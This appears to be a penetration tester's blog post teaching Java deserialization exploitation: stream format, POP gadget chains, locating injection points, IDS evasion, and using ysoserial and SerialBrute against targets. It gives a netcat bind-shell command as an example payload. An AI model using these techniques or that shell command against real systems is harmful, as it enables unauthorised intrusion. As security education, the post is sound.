Attacking Java Deserialization

Deserialization vulnerabilities are far from new, but exploiting them is more involved than other common vulnerability classes. During a recent client engagement I was able to take advantage of Java deserialization to gain a foothold on a server from where I was able to obtain root access to tens of servers spanning pre-production and production environments across multiple data centres. The vulnerability I discovered had previously survived multiple pentests and I would have missed it too if I hadn’t had prior exposure to Java (de)serialization.

In this blog post I’ll attempt to clear up some confusion around deserialization vulnerabilities and hopefully lower the bar to entry in exploiting them using readily available tools. I’ll be focusing on Java, although the same concepts apply to other languages. I’ll also be focusing on command execution exploits in order to keep things simple.

I spoke about this topic at SteelCon this year and will also be speaking on the topic at BSides Manchester and BSides Belfast (on that note, I’m also speaking about poking one of Java’s back doors at 44con this year)!

Update (22/08/2017): A references section has been added at the end of the article listing the links mentioned throughout the article.

(De)serialization

Briefly, serialization is the process of converting runtime variables and program objects into a form that can be stored or transmitted. Deserialization is the reverse process that converts the serialized form back into in-memory variables and program objects. The serialized form could be a text-based format such as JSON or XML, or a binary format. Many higher level languages such as C#, Java, and PHP have built-in support for data serialization which is trivial to use and saves the developer from having to implement these routines themselves. In this blog post I’ll be focusing on Java’s built-in serialization format but other formats can come with similar risks (check out Alvaro Muñoz and Oleksandr Mirosh’s Black Hat USA 2017 and Def Con 25 talk Friday the 13th: JSON Attacks for more on this).

What’s the Problem?

The use of (de)serialization isn’t a problem itself. Problems arise when a user (attacker) can control the data being deserialized, for example if data can be delivered to the deserialization routine over a network connection. If an attacker has control of data being deserialized, then they have some influence over in-memory variables and program objects. Subsequently, if an attacker can influence in-memory variables and program objects, then they can influence the flow of code that uses those variables and objects. Let’s look at an example of Java deserialization:
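A minimal sketch of such a class, assuming the session is stored as a UTF string followed by a boolean. Only ‘loadSession’, ‘username’, and ‘loggedIn’ are named in the description; the ‘saveSession’ helper and the ‘SessionDemo’ class are hypothetical and exist only so the sketch can be run.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.UncheckedIOException;

class Session {
    public String username;
    public boolean loggedIn;

    // Populate this session from serialized bytes. Whoever controls
    // sessionData controls both properties.
    public void loadSession(byte[] sessionData) {
        try (ObjectInputStream ois =
                 new ObjectInputStream(new ByteArrayInputStream(sessionData))) {
            this.username = ois.readUTF();
            this.loggedIn = ois.readBoolean();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Hypothetical counterpart to loadSession, included for illustration only.
    public byte[] saveSession() {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeUTF(username);
            oos.writeBoolean(loggedIn);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bos.toByteArray();
    }
}

class SessionDemo {
    public static void main(String[] args) {
        // The "attacker" builds the bytes offline with whatever values they like.
        Session forged = new Session();
        forged.username = "admin";
        forged.loggedIn = true;
        byte[] attackerBytes = forged.saveSession();

        // The "server" trusts the bytes and ends up with the forged properties.
        Session victim = new Session();
        victim.loadSession(attackerBytes);
        System.out.println(victim.username + " loggedIn=" + victim.loggedIn);
    }
}
```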

The ‘loadSession’ method accepts an array of bytes as a parameter and deserializes a string and a boolean from that byte array into the ‘username’ and ‘loggedIn’ properties of the object. If an attacker can control the contents of the ‘sessionData’ byte array passed to this method then they can control these object properties. The following is an example of how this Session object might be used:
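One way such code might look is sketched here. The ‘PasswordService’ class, its in-memory password map, and the method names are assumptions made for illustration, and ‘Session’ is reduced to a stand-in holding just the two properties.

```java
import java.util.HashMap;
import java.util.Map;

// Stand-in for the deserialized session object: just the two properties.
class Session {
    public String username;
    public boolean loggedIn;
}

// Hypothetical consumer of the session.
class PasswordService {
    private final Map<String, String> passwords = new HashMap<>();

    // Updates the password of whichever user the session claims to belong to,
    // provided the session claims to be logged in.
    public boolean changePassword(Session session, String newPassword) {
        if (session.loggedIn) {
            passwords.put(session.username, newPassword);
            return true;
        }
        return false;
    }

    public String passwordFor(String username) {
        return passwords.get(username);
    }
}

class PasswordDemo {
    public static void main(String[] args) {
        PasswordService service = new PasswordService();

        // Properties as an attacker might set them via forged session data.
        Session forged = new Session();
        forged.username = "admin";
        forged.loggedIn = true;

        boolean changed = service.changePassword(forged, "attacker-chosen");
        System.out.println("password changed: " + changed);
    }
}
```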

If the session is logged in then the password for the user whose username is stored in the session is updated to the given value. This is a simple example of a ‘POP Gadget’, a snippet of code that we have some control over via the properties of an object.

Property-Oriented Programming

When we control object properties and use them to influence the flow of code execution in this way we are doing what’s known as ‘property-oriented programming’. A POP gadget is a code snippet that we can influence to our advantage by manipulating the properties of some object. Often multiple gadgets will need chaining in order to create a complete exploit. We can think of this as high-level ROP (return-oriented programming – a technique used in memory corruption exploits) except that instead of a ROP gadget pushing a value onto the stack, a POP gadget might allow us to write some data to a file.

An important point here is that a deserialization exploit does not involve sending classes or code to the server to execute. We’re simply sending the properties of classes that the server is already aware of in order to manipulate existing code that deals with those properties. A successful exploit hence relies on knowledge of the code that can be manipulated through deserialization. This is where a lot of the difficulty in exploiting deserialization vulnerabilities stems from.

Interesting Gadgets

POP gadgets can exist anywhere in a program. The only requirements are that the code can be manipulated using the properties of deserialized objects, and that an attacker can control the data being deserialized. Some gadgets are of greater interest, however, because their execution is more predictable. In Java, a serializable class can define a method named readObject which can be used to perform special handling during deserialization (for example supporting backwards compatibility). This method can also be used to respond to the event of an object of that class being deserialized. An example use of this method might be for a database manager object to automatically establish a connection to the database when it is deserialized into memory. Most Java serialization exploits take advantage of the code within these readObject methods because that code is guaranteed to run whenever an object of the class is deserialized.
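The database manager example can be sketched roughly as follows. The class name, the ‘jdbcUrl’ field, and the ‘connectionLog’ list (which stands in for opening a real connection) are all hypothetical. The point is only that ‘readObject’ runs automatically, using whatever property values arrived in the stream.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

class DatabaseManager implements Serializable {
    private static final long serialVersionUID = 1L;

    // Stand-in for real connections: records every URL we "connect" to.
    static final List<String> connectionLog = new ArrayList<>();

    private final String jdbcUrl;

    DatabaseManager(String jdbcUrl) {
        this.jdbcUrl = jdbcUrl;
    }

    private void connect() {
        connectionLog.add(jdbcUrl);
    }

    // Called by ObjectInputStream whenever a DatabaseManager is deserialized.
    private void readObject(ObjectInputStream in)
            throws IOException, ClassNotFoundException {
        in.defaultReadObject(); // restores jdbcUrl from the stream
        connect();              // acts on the stream-supplied value
    }
}

class ReadObjectDemo {
    static byte[] serialize(Object o) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
        return bos.toByteArray();
    }

    static Object deserialize(byte[] data) {
        try (ObjectInputStream ois =
                 new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        byte[] bytes = serialize(new DatabaseManager("jdbc:example://attacker-chosen"));
        deserialize(bytes);
        System.out.println(DatabaseManager.connectionLog);
    }
}
```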

Exploiting Deserialization

To exploit a deserialization vulnerability we need two key things:

  1. An entry point that allows us to send our own serialized objects to the target for deserialization.
  2. One or more code snippets that we can manipulate through deserialization.

Entry Points

We can identify entry points for deserialization vulnerabilities by reviewing application source code for the use of the class ‘java.io.ObjectInputStream’ (and specifically the ‘readObject’ method), or for serializable classes that implement the ‘readObject’ method. If an attacker can manipulate the data that is provided to the ObjectInputStream then that data presents an entry point for deserialization attacks. Alternatively, or if the Java source code is unavailable, we can look for serialized data being stored on disk or transmitted over the network, provided we know what to look for!

The Java serialization format begins with a two-byte magic number which is always 0xAC ED. This is followed by a two-byte version number. I’ve only ever seen version 5 (0x00 05), but earlier versions may exist and later versions may appear in future. Following the four-byte header are one or more content elements. The first byte of each element should be in the range 0x70 to 0x7E and describes the type of the content element, which is used to infer the structure of the data that follows in the stream. For more details see Oracle’s documentation on the Object Serialization Stream Protocol.
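As a rough illustration, the header and the first content byte can be checked with the constants that the JDK exposes in ‘java.io.ObjectStreamConstants’. The ‘StreamHeader’ class and its method names are made up for this sketch.

```java
import java.io.ObjectStreamConstants;

class StreamHeader {
    // Read a big-endian two-byte value at the given offset.
    static short readShort(byte[] d, int off) {
        return (short) (((d[off] & 0xFF) << 8) | (d[off + 1] & 0xFF));
    }

    // True if the data starts with the 0xAC ED magic plus a version field.
    static boolean hasHeader(byte[] d) {
        return d.length >= 4
            && readShort(d, 0) == ObjectStreamConstants.STREAM_MAGIC;
    }

    // The two-byte version number that follows the magic number.
    static int version(byte[] d) {
        return readShort(d, 2);
    }

    // True if the byte is a valid content element type (0x70 to 0x7E).
    static boolean isContentType(byte b) {
        return b >= ObjectStreamConstants.TC_BASE
            && b <= ObjectStreamConstants.TC_MAX;
    }

    public static void main(String[] args) {
        // Header followed by a TC_STRING element holding "A".
        byte[] stream = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05, 0x74, 0x00, 0x01, 0x41};
        System.out.println("header present: " + hasHeader(stream));
        System.out.println("version: " + version(stream));
        System.out.println("valid content type: " + isContentType(stream[4]));
    }
}
```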

People often say to look for the four-byte sequence 0xAC ED 00 05 in order to identify Java serialization, and in fact some IDS signatures look for this sequence to detect attacks. During my recent client engagement I didn’t immediately see those four bytes because the target client application kept a network connection to the server open the entire time it was running and the four-byte header only exists once at the very beginning of a serialization stream. The client’s IDS missed my attacks for this reason – my payloads were sent later in the stream and separately from the serialization header.

We can use an ASCII dump to help identify Java serialization data without relying on the four-byte 0xAC ED 00 05 header.

The most obvious indicator of Java serialization data is the presence of Java class names in the dump, such as ‘java.rmi.dgc.Lease’. In some cases Java class names might appear in an alternative format that begins with an ‘L’, ends with a ‘;’, and uses forward slashes to separate namespace parts and the class name (e.g. ‘Ljava/rmi/dgc/VMID;’). Along with Java class names, there are some other common strings that appear due to the serialization format specification, such as ‘sr’ which may represent an object (TC_OBJECT) followed by its class description (TC_CLASSDESC), or ‘xp’ which may indicate the end of the class annotations (TC_ENDBLOCKDATA) for a class which has no super class (TC_NULL).
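To see these indicators for yourself, a simple ASCII dump can be produced in a few lines of Java. This is only a sketch: the ‘AsciiDump’ class is hypothetical, and ‘java.util.Date’ is used purely as a convenient serializable class to dump.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.UncheckedIOException;
import java.util.Date;

class AsciiDump {
    // Render printable ASCII bytes as characters and everything else as '.'.
    static String asciiDump(byte[] data) {
        StringBuilder sb = new StringBuilder(data.length);
        for (byte b : data) {
            int v = b & 0xFF;
            sb.append(v >= 0x20 && v <= 0x7E ? (char) v : '.');
        }
        return sb.toString();
    }

    static byte[] serialize(Object o) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) {
        // The dump should show "sr", the class name, and "xp".
        System.out.println(asciiDump(serialize(new Date(0L))));
    }
}
```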

Having identified the use of serialized data, we need to identify the offset into that data where we can actually inject a payload. The target needs to call ‘ObjectInputStream.readObject’ in order to deserialize and instantiate an object (payload) and support property-oriented programming. However, it could call other ObjectInputStream methods first, such as ‘readInt’, which simply reads a 4-byte integer from the stream. The readObject method will read the following content types from a serialization stream:

  • 0x70 – TC_NULL
  • 0x71 – TC_REFERENCE
  • 0x72 – TC_CLASSDESC
  • 0x73 – TC_OBJECT
  • 0x74 – TC_STRING
  • 0x75 – TC_ARRAY
  • 0x76 – TC_CLASS
  • 0x7B – TC_EXCEPTION
  • 0x7C – TC_LONGSTRING
  • 0x7D – TC_PROXYCLASSDESC
  • 0x7E – TC_ENUM

In the simplest cases an object will be the first thing read from the serialization stream and we can insert our payload directly after the 4-byte serialization header. We can identify those cases by looking at the first five bytes of the serialization stream. If those five bytes are a four-byte serialization header (0xAC ED 00 05) followed by one of the values listed above then we can attack the target by sending our own four-byte serialization header followed by a payload object.

In other cases, the four-byte serialization header will most likely be followed by a TC_BLOCKDATA element (0x77) or a TC_BLOCKDATALONG element (0x7A). The former consists of a single byte length field followed by that many bytes making up the actual block data and the latter consists of a four-byte length field followed by that many bytes making up the block of data. If the block data is followed by one of the element types supported by readObject then we can inject a payload after the block data.
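The logic above can be sketched as a small scanner that skips any leading block data and reports the offset of the first element that readObject can consume. The ‘PayloadOffset’ class is hypothetical and only handles the cases described here. It makes no attempt to parse the elements themselves.

```java
class PayloadOffset {
    // Element types that ObjectInputStream.readObject will read.
    static boolean isReadObjectType(int type) {
        return (type >= 0x70 && type <= 0x76) || (type >= 0x7B && type <= 0x7E);
    }

    // Returns the offset at which a payload object could be injected,
    // or -1 if no suitable element follows the header and block data.
    static int findInjectionOffset(byte[] s) {
        if (s.length < 5 || (s[0] & 0xFF) != 0xAC || (s[1] & 0xFF) != 0xED) {
            return -1;
        }
        int pos = 4; // skip the magic number and version
        while (pos < s.length) {
            int type = s[pos] & 0xFF;
            if (type == 0x77) {            // TC_BLOCKDATA: one-byte length
                if (pos + 1 >= s.length) return -1;
                pos += 2 + (s[pos + 1] & 0xFF);
            } else if (type == 0x7A) {     // TC_BLOCKDATALONG: four-byte length
                if (pos + 4 >= s.length) return -1;
                int len = ((s[pos + 1] & 0xFF) << 24) | ((s[pos + 2] & 0xFF) << 16)
                        | ((s[pos + 3] & 0xFF) << 8) | (s[pos + 4] & 0xFF);
                if (len < 0 || len > s.length - pos - 5) return -1;
                pos += 5 + len;
            } else {
                return isReadObjectType(type) ? pos : -1;
            }
        }
        return -1;
    }

    public static void main(String[] args) {
        // Header, TC_BLOCKDATA holding a 4-byte int, then a TC_STRING "hi".
        byte[] stream = {
            (byte) 0xAC, (byte) 0xED, 0x00, 0x05,
            0x77, 0x04, 0x00, 0x00, 0x00, 0x01,
            0x74, 0x00, 0x02, 0x68, 0x69
        };
        System.out.println("inject at offset " + findInjectionOffset(stream));
    }
}
```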

I wrote a tool to support some of my research in this area, SerializationDumper, which we can use to identify entry points for deserialization exploits. The tool parses Java serialization streams and dumps them out in a human-readable form. If the stream contains one of the element types supported by readObject then we can replace that element with a payload object. Below is an example of its use:

In this example the stream contains a TC_BLOCKDATA followed by a TC_STRING which can be replaced with a payload.

Objects in a serialization stream are instantiated as they are loaded, rather than after the entire stream has been parsed. This fact allows us to inject payloads into a serialization stream without worrying about correcting the remainder of the stream. The payload will be deserialized and executed before any kind of validation happens and before the application attempts to read further data from the serialization stream.
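This behaviour is easy to confirm with a small experiment. In the sketch below, the hypothetical ‘Marker’ class sets a flag from its ‘readObject’ method as a stand-in for a gadget’s side effects. The stream holds one ‘Marker’ followed by junk bytes that are not valid serialization data.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.UncheckedIOException;

class Marker implements Serializable {
    private static final long serialVersionUID = 1L;
    static boolean triggered = false;

    private void readObject(ObjectInputStream in)
            throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        triggered = true; // stand-in for a gadget's side effects
    }
}

class EagerDemo {
    // A valid serialized Marker followed by bytes that corrupt the stream.
    static byte[] buildStream() {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new Marker());
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
        byte[] junk = {0x00, 0x01, 0x02};
        bos.write(junk, 0, junk.length);
        return bos.toByteArray();
    }

    // Reads two objects; returns false if the stream fails to parse.
    static boolean restOfStreamParses(byte[] stream) {
        try (ObjectInputStream ois =
                 new ObjectInputStream(new ByteArrayInputStream(stream))) {
            ois.readObject(); // Marker.readObject runs here
            ois.readObject(); // hits the junk bytes
            return true;
        } catch (IOException | ClassNotFoundException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        boolean parsed = restOfStreamParses(buildStream());
        System.out.println("rest of stream parsed: " + parsed);
        System.out.println("side effect triggered: " + Marker.triggered);
    }
}
```

The side effect fires even though the stream as a whole is invalid, which is why the remainder of the stream does not need to be repaired after a payload is injected.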

POP Gadgets

Having identified an entry point that allows us to provide our own serialized objects for the target to deserialize, the next thing we need are POP gadgets. If we have access to the source code then we can look for ‘readObject’ methods and code following calls to ‘ObjectInputStream.readObject’ in order to work out what potential gadgets exist.

Often we don’t have access to application source code but this doesn’t prevent us from exploiting deserialization vulnerabilities because there are lots of commonly used third-party libraries that can be targeted. Researchers including Chris Frohoff and Gabriel Lawrence have already found POP gadget chains in various libraries and released a tool called ysoserial that can generate payload objects. This tool greatly simplifies the process of attacking Java deserialization vulnerabilities!

There are a lot of gadget chains included in ysoserial so the next step is to work out which, if any, can be used against the target. Background knowledge about the third-party libraries used by the application, or an information disclosure issue, should be the first port of call. If we know which third-party libraries are used by the target then we can select the appropriate ysoserial payload(s) to try. Unfortunately this information might not be readily available in which case we can, with caution, cycle through the various ysoserial gadget chains until we find one we can use. Care should be taken with this approach as there is always a risk of triggering an unhandled exception and crashing the target application. The target would have to be particularly unstable for this to happen, however, as even an nmap version scan would likely cause the target to crash if it couldn’t handle unexpected/malformed data.

If the target application responds to a ysoserial payload with a ‘ClassNotFoundException’ then chances are that the library targeted by the chosen gadget chain is not available to the target application. A ‘java.io.IOException’ with the message ‘Cannot run program’ likely means that the gadget chain worked, but the operating system command that the gadget chain attempted to execute was not available on the server.
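When cycling through gadget chains, this interpretation can be automated with simple string matching. The sketch below assumes the target returns exception text in its response, which will not always be the case. The ‘ResponseClassifier’ class and its ‘Outcome’ values are hypothetical.

```java
class ResponseClassifier {
    enum Outcome {
        LIBRARY_PROBABLY_MISSING,      // gadget chain's library not on the classpath
        CHAIN_WORKED_COMMAND_MISSING,  // chain ran, but the OS command was not found
        UNKNOWN
    }

    // Classify a response using the two exception patterns described above.
    static Outcome classify(String response) {
        if (response.contains("java.io.IOException")
                && response.contains("Cannot run program")) {
            return Outcome.CHAIN_WORKED_COMMAND_MISSING;
        }
        if (response.contains("ClassNotFoundException")) {
            return Outcome.LIBRARY_PROBABLY_MISSING;
        }
        return Outcome.UNKNOWN;
    }

    public static void main(String[] args) {
        // Illustrative response text, not captured from a real target.
        String response = "java.io.IOException: Cannot run program \"example\"";
        System.out.println(classify(response));
    }
}
```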

The ysoserial command execution payloads are blind payloads and the command output is not returned. There are also a couple of limitations due to the use of ‘java.lang.Runtime.exec(String)’. The first is that shell operators such as output redirection and piping are not supported. The second is that parameters to the payload command cannot contain spaces (e.g. we can use “nc -lp 31313 -e /bin/sh” but we can’t use “perl -e ‘use Socket;…’” because the parameter to perl contains a space). Fortunately there’s a nice payload encoder/generator available online that gets around these limitations: http://jackson.thuraisamy.me/runtime-exec-payloads.html.
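Both limitations follow from how ‘Runtime.exec(String)’ is documented to behave: it splits the command on whitespace using ‘new StringTokenizer(command)’ and runs the result directly, without a shell. The sketch below reproduces that splitting step so its effect on quoted parameters is visible. The ‘ExecTokens’ class and the sample commands are illustrative only.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.StringTokenizer;

class ExecTokens {
    // Split a command the same way Runtime.exec(String) is documented to:
    // on whitespace, with no awareness of quotes or shell operators.
    static List<String> tokenize(String command) {
        StringTokenizer tokenizer = new StringTokenizer(command);
        List<String> tokens = new ArrayList<>();
        while (tokenizer.hasMoreTokens()) {
            tokens.add(tokenizer.nextToken());
        }
        return tokens;
    }

    public static void main(String[] args) {
        // No parameter contains a space, so the argument list is as intended.
        System.out.println(tokenize("nc -lp 31313 -e /bin/sh"));

        // The quoted parameter is broken apart, and the quote characters are
        // passed through literally as part of the arguments.
        System.out.println(tokenize("sh -c 'echo a b'"));
    }
}
```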

Try it Yourself – DeserLab and SerialBrute

It’s important to understand serialization and how deserialization exploits work (e.g. property-oriented programming) in order to effectively exploit deserialization vulnerabilities. Doing so is still more involved than other common vulnerability classes so it’s helpful to have a target to practice on. Along with this blog post, I’ve created and released a demo application called DeserLab that implements a custom network protocol on top of the Java serialization format. The application is vulnerable to deserialization attacks and should be exploitable using the information provided in this blog post.

SerialBrute is a pair of Python scripts that I wrote and use to automate testing of ysoserial payloads against arbitrary targets. The first, ‘SerialBrute.py’, can replay a TCP conversation or HTTP request and inject a payload at a given point, while the second, ‘SrlBrt.py’, is a skeleton script that can be altered to deliver payloads where special processing is needed. Both attempt to detect valid and invalid payloads by looking at returned exceptions. These scripts are not intended to be full-blown or polished attack tools and should be used with caution due to the risk of knocking an application over, but I’ve personally had great success replaying TCP conversations and injecting ysoserial gadget chains.

Thanks for reading! Have a go at DeserLab if this is something you’re interested in. If there’s anything I’ve missed, anything that could do with further explanation, or you have any questions or feedback, please leave a comment or get in touch on Twitter (@NickstaDB)!

References

The following references, mostly mentioned throughout this blog post, may be useful in learning more about (de)serialization vulnerabilities and exploits.

The following presentations cover property-oriented programming (POP) and, for those who are interested, return-oriented programming (ROP). Note that the ROP presentation is only mentioned due to the similarities with POP (i.e. controlling existing code); the ROP technique itself is not relevant to deserialization exploits.

The following articles and presentations discuss PHP and Java deserialization vulnerabilities:

The following talk looks at deserialization vulnerabilities in JSON and XML libraries for Java and .NET:

The following sections of the Java documentation describe the serialization data format and the Serializable interface:

The tools mentioned throughout this blog post can be found at the following links:

Finally, the following people have done significant work around Java deserialization exploitation:
